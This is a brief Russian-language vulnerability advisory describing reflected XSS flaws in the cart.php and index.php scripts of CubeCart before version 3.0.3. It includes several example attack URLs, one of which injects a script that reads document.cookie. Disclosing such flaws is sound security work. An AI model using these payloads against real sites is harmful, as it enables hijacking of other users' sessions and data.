Программа: CubeCart версии до 3.0.3

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
существует в сценариях ‘cart.php’ и ‘index.php’ при
обработке входных данных. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Примеры:

http://[target]/cc3/cart.php?act=reg&redir=L3NpdGU
vZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0 lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyO
SUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZX dDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]

http://[target]/cc3/cart.php?act=reg &redir= [XSS-CODE]

http://[target]/cc3/index.php?searchStr=%3D%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2 Fscript%3E&act=viewCat&Submit=Go

http://[target]/cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3R G9jJmFtcDtkb2NJZD0x[XSS-CODE]



Оставить мнение